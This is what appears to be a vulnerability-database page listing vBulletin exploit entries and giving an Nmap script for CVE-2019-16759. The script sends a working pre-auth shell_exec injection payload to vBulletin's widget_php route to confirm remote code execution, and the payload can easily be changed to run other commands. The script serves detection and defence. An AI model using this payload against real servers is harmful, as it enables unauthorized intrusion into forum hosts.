| Reporter | Title | Published | Views | Family All 69 |
|---|---|---|---|---|
| vBulletin 5.x - Remote Command Execution Exploit | 1 Oct 201900:00 | – | zdt | |
| vBulletin 5.5.4 Remote Command Execution Exploit #RCE | 11 Dec 201900:00 | – | zdt | |
| vBulletin 5.6.2 - (widget_tabbedContainer_tab_panel) Remote Code Execution Exploit | 12 Aug 202000:00 | – | zdt | |
| vBulletin 5.x Remote Code Execution Exploit | 12 Aug 202000:00 | – | zdt | |
| Exploit for Code Injection in Vbulletin | 16 Aug 202018:17 | – | githubexploit | |
| Exploit for Code Injection in Vbulletin | 16 Aug 202018:17 | – | githubexploit | |
| Exploit for Code Injection in Vbulletin | 26 Sep 201903:56 | – | githubexploit | |
| Exploit for Code Injection in Vbulletin | 12 Oct 201918:51 | – | githubexploit | |
| Exploit for Code Injection in Vbulletin | 24 Aug 202016:15 | – | githubexploit | |
| Exploit for Code Injection in Vbulletin | 26 Sep 201903:27 | – | githubexploit |
`description = [[
vBulletin 5.x 0day pre-auth RCE exploit
This should work on all versions from 5.0.0 till 5.5.4
]]
local http = require "http"
local shortport = require "shortport"
local vulns = require "vulns"
local stdnse = require "stdnse"
local string = require "string"
---
-- @usage
-- nmap -p <port> --script http-vuln-CVE-2019-16759 <target>
--
-- @output
-- PORT STATE SERVICE
-- s4430/tcp open http
-- | http-vuln-CVE-2019-16759:
-- | VULNERABLE
-- | vBulletin 5.x 0day pre-auth RCE exploit
-- | State: VULNERABLE
-- | IDs: CVE:CVE-2019-16759
-- |
-- | Disclosure date: 2019-09-23
-- | References:
-- | https://seclists.org/fulldisclosure/2019/Sep/31
-- |_ https://nvd.nist.gov/vuln/detail/CVE-2019-16759
--
-- @args http-vuln-cve2019-16759.path The default URL path to request. The default is "/".
author = "r00tpgp"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = { "vuln" }
portrule = shortport.http
action = function(host, port)
local vuln = {
title = "vBulletin 5.x 0day pre-auth RCE exploit",
state = vulns.STATE.NOT_VULN,
description = [[
vBulletin 5.x 0day pre-auth RCE exploit
This should work on all versions from 5.0.0 till 5.5.4
]],
IDS = {
CVE = "CVE-2019-16759"
},
references = {
'https://seclists.org/fulldisclosure/2019/Sep/31',
'https://nvd.nist.gov/vuln/detail/CVE-2019-16759',
},
dates = {
disclosure = { year = '2019', month = '09', day = '23' }
}
}
local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
local method = stdnse.get_script_args(SCRIPT_NAME..".method") or "POST"
local path = stdnse.get_script_args(SCRIPT_NAME..".path") or "/index.php?routestring=ajax/render/widget_php"
local body = {
["widgetConfig[code]"] = "echo shell_exec(\'echo h4x0000r > /tmp/nmap.check.out; cat /tmp/nmap.check.out\');exit;",
}
local options = {
header = {
Connection = "close",
["Content-Type"] = "application/x-www-form-urlencoded",
["User-Agent"] = "curl/7.65.3",
["Accept"] = "*/*",
},
content = body
}
local response = http.post(host, port, path, nil, nil, body)
if response and string.match(response.body, "h4x0000r") then
vuln.state = vulns.STATE.VULN
end
return vuln_report:make_output(vuln)
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation